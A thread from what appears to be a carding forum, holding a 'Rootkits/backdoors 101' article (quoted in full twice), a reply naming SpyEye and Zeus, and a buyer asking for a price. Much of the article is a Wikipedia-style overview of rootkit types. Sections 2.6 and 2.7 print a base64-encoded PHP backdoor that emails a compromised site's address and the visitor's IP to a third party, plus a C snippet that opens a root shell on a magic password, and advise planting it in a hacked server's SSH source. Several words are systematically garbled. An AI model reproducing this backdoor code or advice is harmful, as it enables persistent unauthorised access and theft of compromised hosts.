<h1>CARDING FORUM</h1>

CARDERSHOP.CC CVV SHOP
BUY CVV / BUY DUMPS WITHOUT PIN
BEST CVV SHOP / CC SHOP
CVV SHOP ONLINE


Go Back   Carding Forum ¤ (carding forum, card fraud, carding board, darknet forum, darknet markets, credit card fraud, fraud, atm fraud, cvv shop, atm skimmers, emv chip dumps, dumps shop, credit cards cvv, credit cards cvv2, dumps, dumps with pin, cvv2, buy dumps, buy credit cards, dumps with pin for sale, fresh stuff, dumps 101, dumps 201, dumps+pin, buy dumps with pin) > English-speaking carders > Hacking & Coding > Articles
Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
Old 27-07-2011, 02:26 PM   #1
KNS
Member
 
Join Date: Jul 2011
Posts: 34
Reputation: 9
Default Rootkits/backdoors 101

Title:Rootkits/backdoors 101
Author:KNS

I. What is a rootkit?

A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other abtclications(backdoor). - WIkipedia

1. What are rootkits useful for?
After getting access to a system and escalating your privileges to root it would be nice to have backdoor on that server, right? Imagine you spend a lot of hours trying to get in and twice the amount of that time to get root, the next day administrators find out and patch everything, then you are basically fucked. To prevent this from habtcening rootkits are extremely useful but also easily detected by rootkit hunters (anti-backdoor software).

2. Types of rootkits
There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode.

(Note that Ring ‑1 is not shown in image below)


2.1 User-mode
User-mode rootkits run in Ring 3, along with other abtclications as user, rather than low-level system processes.They have a number of possible installation vectors to intercept and modify the standard behavior of abtclication programming interfaces (APIs). Some inject a dynamically-linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target abtclication.

2.2 Kernel mode
Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems subtcort kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write.

2.3 Bootkits
A kernel-mode rootkit variant called a bootkit is used predominantly to attack full disk encryption systems, for example as in the "Evil Maid Attack", in which a bootkit replaces the legitimate boot loader with one controlled by an attacker; typically the malware loader persists through the transition to protected mode when the kernel has loaded. For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords.[38] More recently, the Alureon rootkit has successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record.

2.4 Hypervisor level
Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions.

2.5 Hardware/Firmware
A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a network card, hard drive, or the system BIOS. The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines[44] and in a PCI expansion card ROM

2.6 PHP backdoor
There are a lot of php backdoors, mainly planted into "PHP shells" used by hackers like us (c99, r57 etc.). Let's examine the following "legitimate php shell":
Code:
http://pastebin.com/raw.php?i=tUCqQpx9
If aren't skilled in PHP, you can do "a basic brief" over the PHP file, it doesn't take a genius, really. You scroll-down and scroll and scroll... and at line 399 you find something... a base64 encoded string. A quick google query "online base64 decoder" and we have ourselves where to decode that string (http://www.opinionatedgeek.com/dotne.../base64decode/). So we input:
Code:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7
The decoded output is:

Code:
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "Fx29Shell http://$target by $visitor";
  $body    = "Bug: $target by $visitor<br>";
  if (!empty($web)) { @mail("feelcomz@gmail.com",$judul,$body); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
What do we have here? "feelcomz@gmail.com" receives an email once someone enters his shell, he gets IP and location of shell. Now isn't that a comfortable backdoor? Instead of going to hack websites by yourself, you backdoor one, try to popularize it in some way and you have a good "income" of shells.

2.7 Specific case for C programs
For c code programs (same example as in the proftpd 1.3.3c backdoor that was placed, recommend you analyze)
Code:
if (strcmp(target, "iwantroot") == 0) { setuid(0); setgid(0);system("/bin/sh;/sbin/sh"); }
It is good to use it after you have hacked a server and gained root access to input this into their SSH src and have a nice backdoor

II. Reference/Thanks 2
Wikipedia
KNS is offline Add Infraction for KNS   Reply With Quote
Old 24-07-2012, 08:21 AM   #2
developer
RIPPER
 
Join Date: Jul 2012
Posts: 80
Reputation: 5
Default

Quote:
Originally Posted by KNS View Post
Title:Rootkits/backdoors 101
Author:KNS

I. What is a rootkit?

A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other abtclications(backdoor). - WIkipedia

1. What are rootkits useful for?
After getting access to a system and escalating your privileges to root it would be nice to have backdoor on that server, right? Imagine you spend a lot of hours trying to get in and twice the amount of that time to get root, the next day administrators find out and patch everything, then you are basically fucked. To prevent this from habtcening rootkits are extremely useful but also easily detected by rootkit hunters (anti-backdoor software).

2. Types of rootkits
There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode.

(Note that Ring ‑1 is not shown in image below)


2.1 User-mode
User-mode rootkits run in Ring 3, along with other abtclications as user, rather than low-level system processes.They have a number of possible installation vectors to intercept and modify the standard behavior of abtclication programming interfaces (APIs). Some inject a dynamically-linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target abtclication.

2.2 Kernel mode
Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems subtcort kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write.

2.3 Bootkits
A kernel-mode rootkit variant called a bootkit is used predominantly to attack full disk encryption systems, for example as in the "Evil Maid Attack", in which a bootkit replaces the legitimate boot loader with one controlled by an attacker; typically the malware loader persists through the transition to protected mode when the kernel has loaded. For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords.[38] More recently, the Alureon rootkit has successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record.

2.4 Hypervisor level
Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions.

2.5 Hardware/Firmware
A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a network card, hard drive, or the system BIOS. The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines[44] and in a PCI expansion card ROM

2.6 PHP backdoor
There are a lot of php backdoors, mainly planted into "PHP shells" used by hackers like us (c99, r57 etc.). Let's examine the following "legitimate php shell":
Code:
http://pastebin.com/raw.php?i=tUCqQpx9
If aren't skilled in PHP, you can do "a basic brief" over the PHP file, it doesn't take a genius, really. You scroll-down and scroll and scroll... and at line 399 you find something... a base64 encoded string. A quick google query "online base64 decoder" and we have ourselves where to decode that string (http://www.opinionatedgeek.com/dotne.../base64decode/). So we input:
Code:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJmZWVsY29tekBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7
The decoded output is:

Code:
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "Fx29Shell http://$target by $visitor";
  $body    = "Bug: $target by $visitor<br>";
  if (!empty($web)) { @mail("feelcomz@gmail.com",$judul,$body); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
What do we have here? "feelcomz@gmail.com" receives an email once someone enters his shell, he gets IP and location of shell. Now isn't that a comfortable backdoor? Instead of going to hack websites by yourself, you backdoor one, try to popularize it in some way and you have a good "income" of shells.

2.7 Specific case for C programs
For c code programs (same example as in the proftpd 1.3.3c backdoor that was placed, recommend you analyze)
Code:
if (strcmp(target, "iwantroot") == 0) { setuid(0); setgid(0);system("/bin/sh;/sbin/sh"); }
It is good to use it after you have hacked a server and gained root access to input this into their SSH src and have a nice backdoor

II. Reference/Thanks 2
Wikipedia
This interesting thanx
developer is offline Add Infraction for developer   Reply With Quote
Old 06-10-2012, 03:10 AM   #3
destractions
BANNED
 
Join Date: Sep 2012
Location: Information
Posts: 27
Reputation: -1
Default

i am use backdoors is spyeye and zeus perfect jobs
destractions is offline Add Infraction for destractions   Reply With Quote
Old 20-10-2012, 06:16 AM   #4
2012CarderPro
BANNED
 
Join Date: Oct 2012
Posts: 20
Reputation: -1
Send a message via ICQ to 2012CarderPro
Default

what about private product? price plese
2012CarderPro is offline Add Infraction for 2012CarderPro   Reply With Quote
Reply

Bookmarks

Tags
rootkit backdoor 101


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -5. The time now is 11:59 PM.